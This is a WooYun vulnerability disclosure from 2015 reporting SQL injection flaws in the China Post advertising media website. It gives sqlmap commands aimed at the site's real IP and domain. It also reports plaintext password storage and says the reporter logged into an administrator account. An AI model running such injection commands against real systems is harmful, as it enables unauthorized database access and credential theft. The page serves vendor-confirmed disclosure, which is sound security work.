当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093955

漏洞标题:中国邮政广告传媒网各种SQL注入打包(密码明文保存)

相关厂商:中国邮政集团公司信息技术局

漏洞作者: answer

提交时间:2015-01-26 09:32

修复时间:2015-03-12 09:32

公开时间:2015-03-12 09:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-26: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-02-05: 细节向核心白帽子及相关领域专家公开
2015-02-15: 细节向普通白帽子公开
2015-02-25: 细节向实习白帽子公开
2015-03-12: 细节向公众公开

简要描述:

求不走小厂商

详细说明:

WooYun: 中国邮政广告传媒网SQL后台登陆注入(万能密码登陆) 灵感来自这里。
它走的是大厂商,我这个也用该走大厂商吧。。
一:
搜索框位置POST注入:
地址:http://124.207.29.201/zygg_fb/wzcp/wzcp.asp

UR@2UDH2(P(WUQ6NY001B_I.jpg


注入点
sqlmap.py -u "www.cpac.com.cn/zygg_fb/zcfg/chaxun_query_res.asp" --data "id=&title=hk&submit=%BF%AA%CA%BC%BC%EC%CB%F7" -p title

D(YMX1[TIXM@ET}0ERME344.png


二:
get型
注入点 http://124.207.29.201/zygg_fb/syxh/news_display.asp?ID=144 (只列举这一个,其他还请记得修补)
三:
cookie中转

8O[G9E%0C22R6RUY~3VLY$C.jpg


一看这个就是到cookie中转。。。
注入点
sqlmap.py -u "http://124.207.29.201/zygg_fb/manage/news/news_display.asp" --cookie "id=2080" --level 3

FX~JTV(SF6RLB0VC{)J_JX8.jpg


东西挺详细的
最坑的在下面:

X}$`ULIAL}AYW@O87(W1JO8.jpg


全是明文保存
尝试登陆管理员账号

E]Z(~$572EB{NSH[XOUR`@5.jpg


W`@0NLXI~Z4UP[@M~[L`Q6L.png


到此为止

漏洞证明:

WooYun: 中国邮政广告传媒网SQL后台登陆注入(万能密码登陆) 灵感来自这里。
它是大厂商,我这个也用该走大厂商吧。。
一:
搜索框的位置:
地址:http://124.207.29.201/zygg_fb/wzcp/wzcp.asp

UR@2UDH2(P(WUQ6NY001B_I.jpg


注入点
sqlmap.py -u "www.cpac.com.cn/zygg_fb/zcfg/chaxun_query_res.asp" --data "id=&title=hk&submit=%BF%AA%CA%BC%BC%EC%CB%F7" -p title

D(YMX1[TIXM@ET}0ERME344.png


二:
get型
注入点 http://124.207.29.201/zygg_fb/syxh/news_display.asp?ID=144 (只列举这一个,其他还请记得修补)
三:
cookie中转

8O[G9E%0C22R6RUY~3VLY$C.jpg


一看这个就是到cookie中转。。。
注入点
sqlmap.py -u "http://124.207.29.201/zygg_fb/manage/news/news_display.asp" --cookie "id=2080" --level 3

FX~JTV(SF6RLB0VC{)J_JX8.jpg


东西挺详细的
最坑的在下面:

X}$`ULIAL}AYW@O87(W1JO8.jpg


全是明文保存
尝试登陆管理员账号

E]Z(~$572EB{NSH[XOUR`@5.jpg


W`@0NLXI~Z4UP[@M~[L`Q6L.png


到此为止

修复方案:

版权声明:转载请注明来源 answer@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-26 10:09

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-26 14:32 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    哈哈,不走小厂商,rank还是5啊

  2. 2015-02-25 10:18 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    这才5RANK,有点坑啊

  3. 2015-03-12 14:23 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    下次记得那句话不要说出来。

  4. 2015-03-16 09:29 | covertops ( 普通白帽子 | Rank:112 漏洞数:23 | wooyun)

    @answer 能问下为什么一下就看出是cookie中转么?这个有什么特征呢?

  5. 2015-03-16 18:28 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    @covertops 感觉呀

  6. 2015-03-17 09:38 | covertops ( 普通白帽子 | Rank:112 漏洞数:23 | wooyun)

    @answer 好吧,瞬间高大上。。。3q